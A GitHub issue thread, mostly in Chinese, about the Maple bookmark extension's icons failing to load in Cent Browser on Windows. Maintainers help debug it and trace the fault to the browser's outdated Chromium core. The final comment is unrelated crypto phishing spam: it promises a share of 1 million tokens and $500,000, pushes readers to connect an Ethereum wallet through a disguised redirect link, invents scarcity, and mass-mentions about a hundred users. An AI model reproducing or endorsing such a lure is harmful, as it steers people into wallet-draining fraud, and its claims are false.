### ISSUE TITLE
图标不加载

### ISSUE THREAD

**Issue by rheatin** [tw93/Maple#36]
在我的macos系统上是正常显示，且美观的，但是在我的windows图标就显示不出来![image](https://github.com/tw93/Maple/assets/20568588/68949d1d-09ef-4251-a850-9e49178e886d)
，试过重新加载也没有用，不过我用的浏览器是Cent Browser
版本 5.0.1002.354（正式版本） （64 位） (Portable) (Chromium 102.0.5005.167)，所以有什么好的解决方法吗

**Comment by tw93** [comment]
会不会是 Chromium 的版本太低了，我试了试其他的 Chromium 也是可以的
可以帮我看看右键审查元素，看看里面的图片是不是地址没有识别到

**Comment by rheatin** [comment]
![image](https://github.com/tw93/Maple/assets/20568588/f319dde2-9b7c-4a41-967b-44c2393316c6)

**Comment by rheatin** [comment]
确实报错了，同样img的URL在macos就没问题，在centbrowser都是 file not found. 我的cent browser是portable版本的，会有这种影响吗

**Comment by rheatin** [comment]
我从书签栏检查图标的URL是下图这样
![image](https://github.com/tw93/Maple/assets/20568588/a878ba54-47b9-4d05-82d8-05b1de47988d)

**Comment by jeasonnow** [comment]
https://developer.chrome.com/docs/extensions/mv3/favicon/

**Comment by jeasonnow** [comment]
[Maple.zip](https://github.com/tw93/Maple/files/12555236/Maple.zip)
@rheatin  麻烦使用这个版本的插件试试呢？

**Comment by rheatin** [comment]
是这样的响应吗？
![image](https://github.com/tw93/Maple/assets/20568588/b37b0970-9cf8-4565-be2a-13e5b18aede7)
![image](https://github.com/tw93/Maple/assets/20568588/920f5797-c2b5-470e-ba8b-8da62e68d317)
![image](https://github.com/tw93/Maple/assets/20568588/12a93c3d-4fcd-4b7b-bf53-0c65a6acd609)

**Comment by rheatin** [comment]
> 
![image](https://github.com/tw93/Maple/assets/20568588/92c22f80-069c-4e3a-953a-7c8b8504e97c)
看来是我浏览器的问题，你发的这个zip在macos的chrome就没问题- -

**Comment by rheatin** [comment]
感谢大佬们的协助，看不了图标不是什么大影响哈~

**Comment by tw93** [comment]
> 感谢大佬们的协助，看不了图标不是什么大影响哈~

还是需要修复 哈哈 我们细节控

**Comment by rheatin** [comment]
> 

在论坛问过啦，他们内核版本不够新，和商店里一些插件有冲突了，等他们更新吧~

**Comment by tw93** [comment]
假如喜欢chrome风格，建议使用 https://thorium.rocks/  这个浏览器
这个先关闭了

**Comment by rheatin** [comment]
> 假如喜欢chrome风格，建议使用 https://thorium.rocks/ 这个浏览器 这个先关闭了

谢谢你的推荐，针不戳，从善如流啦哈哈

**Comment by ErichUanna** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Dsi13nc3, @darwintree, @kenforever, @EKKOmy, @liu316484231, @uidccnn, @wwyoyo03, @wuhecuizao, @JiceJin, @MaxKun, @Eron-H, @sunshanpeng, @hymnfish, @PeterJing0, @Lac1a, @K1ni, @JayceD4real, @VINO42, @kawatsao, @xiaomao996688, @YoouC1, @asbstty, @boboweiqi, @qzz0518, @MirrorHuang, @caixiaomao, @zgayjjf, @alex-x-crypto, @B1ue1nWh1te, @TaueFenCheng, @chixiaowen, @asdwsxzc123, @WBJackWang, @AGLcaicai, @tyevlag, @levelio, @storytellar, @ChinaJiu, @OoguroxRyuuya, @libingheng, @zzzzzzzzzzb, @anxiaoxin, @YanQinYuan, @LittleFi987, @vonjk, @PoarryScript, @xulang361, @Bhargava-krishna, @Bolshevik8964, @lijunnba2009kadai0308, @loki-qi-fe, @dwcc, @lenssiu, @Homermen, @tensoulchen, @pinoccc3, @Licae, @cuinima, @136551109, @furfio, @lhygyly, @doyoudo, @ethdy, @Long199for, @aa66609, @chiggie3, @xmsec, @Double1996, @dd404x, @xujingguo58, @xiaobaiwenlian, @yangmitu, @Byronblock, @SuperSmileForever, @xmpx310, @MingLLuo, @ta99i, @iseekTo, @m0tky, @cuomu33, @QAQ-cmd, @0xan12, @Benbinbin, @zzwmorrowind, @kcilcarus, @Xiechengqi, @hacktfj, @zhouzhixingzzx, @isanwenyu, @12tig, @wangjianyeART, @sirotaku, @SimpleMD, @wys-0628, @huanglizhuo, @cyuxlif, @artistzxt, @KenNaNa, @sid-85
